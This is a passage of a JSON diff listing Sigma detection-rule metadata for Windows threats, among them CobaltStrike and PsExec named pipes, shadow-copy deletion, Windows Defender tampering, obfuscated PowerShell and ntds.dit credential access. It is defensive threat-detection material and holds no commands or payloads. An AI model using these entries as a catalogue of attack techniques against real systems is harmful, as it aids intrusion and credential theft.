"pipe_created_efspotato_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/zcgonvh/EfsPotato", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "value": "EfsPotato Named Pipe" + }, + { + "description": "Detects creation of default named pipes used by the Koh tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_koh_default_pipe.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" + ] + }, + "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "value": "Koh Default Named Pipes" + }, + { + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/25", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/d4rksystem/status/1357010969264873472", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://github.com/Neo23x0/sigma/issues/253", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "value": "CobaltStrike Named Pipe" + }, + { + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike_re.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "value": "CobaltStrike Named Pipe Pattern Regex" + }, + { + "description": "Detects the creation of a named pipe used by known APT malware", + "meta": { + "author": "Florian Roth, blueteam0ps, elhoim", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "value": "Malicious Named Pipe" + }, + { + "description": "Detects PAExec default named pipe", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_paexec_default_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", + "value": "PAExec Default Named Pipe" + }, + { + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_powershell_execution_pipe.yml", + "level": "informational", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", + "value": "PowerShell Execution Via Named Pipe" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_psexec_default_pipe.yml", + "level": "low", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", + "value": "PsExec Default Named Pipe" + }, + { + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", + "falsepositive": [ + "Rare legitimate use of psexec from the locations mentioned above" + ], + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "value": "PsExec Tool Execution From Suspicious Locations - PipeName" + }, + { + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/05/10", + "falsepositive": [ + "Legitimate Administrator activity" + ], + "filename": "pipe_created_psexec_pipes_artifacts.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "value": "PsExec Pipes Artifacts" + }, + { + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2021/10/08", + "falsepositive": [ + "Processes in the filter condition" + ], + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", + "https://o365blog.com/post/adfs/", + "https://github.com/Azure/SimuLand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "value": "ADFS Database Named Pipe Connection" + }, + { + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "meta": { + "author": "Florian Roth, Christian Burkard", + "creation_date": "2021/07/30", + "falsepositive": [ + "Chrome instances using the exact same pipe name \"mojo.something\"" + ], + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "value": "CobaltStrike Named Pipe Patterns" + }, + { + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" + ], + "tags": [ + "attack.t1047", + "attack.execution" + ] + }, + "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", + "value": "WMI Event Consumer Created Named Pipe" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": "posh_pc_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", + "value": "Alternate PowerShell Hosts" + }, + { + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "meta": { + "author": "frack113", + "creation_date": "2021/06/03", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + ], + "filename": "posh_pc_delete_volume_shadow_copies.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "value": "Delete Volume Shadow Copies Via WMI With PowerShell" + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "meta": { + "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", + "creation_date": "2017/03/22", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_downgrade_attack.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6331d09b-4785-4c13-980f-f96661356249", + "value": "PowerShell Downgrade Attack - PowerShell" + }, + { + "description": "Detects PowerShell called from an executable by the version mismatch method", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_exe_calling_ps.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "value": "PowerShell Called from an Executable Version Mismatch" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_powercat.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", + "value": "Netcat The Powershell Version" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pc_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "value": "Remote PowerShell Session (PS Classic)" + }, + { + "description": "Detects renamed powershell", + "meta": { + "author": "Harish Segar, frack113", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_renamed_powershell.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "value": "Renamed Powershell Under Powershell Channel" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_pc_susp_download.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "value": "Suspicious PowerShell Download" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "value": "Use Get-NetTCPConnection" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" + }, + { + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "meta": { + "author": "frack113", + "creation_date": "2021/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_tamper_with_windows_defender.yml", + "level": "high", + "logsource.category": "ps_classic_provider_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "value": "Tamper Windows Defender - PSClassic" + }, + { + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_wsman_com_provider_no_powershell.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/bohops/WSMan-WinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "value": "Suspicious Non PowerShell WSMAN COM Provider" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_xor_commandline.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": "posh_pm_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", + "value": "Alternate PowerShell Hosts - PowerShell Module" + }, + { + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "meta": { + "author": "ok @securonix invrep_de, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + ], + "filename": "posh_pm_bad_opsec_artifacts.yml", + "level": "critical", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://www.mdeditor.tw/pl/pgRt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "value": "Bad Opsec Powershell Code Artifacts" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_pm_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", + "value": "Clear PowerShell History - PowerShell Module" + }, + { + "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_decompress_commands.yml", + "level": "informational", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/8", + "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "value": "PowerShell Decompress Commands" + }, + { + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_addbaccount.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", + "value": "Suspicious Get-ADDBAccount Usage" + }, + { + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_get_clipboard.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "value": "PowerShell Get Clipboard" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "2f211361-7dce-442d-b78a-c04039677378", + "value": "Invoke-Obfuscation Obfuscated IEX 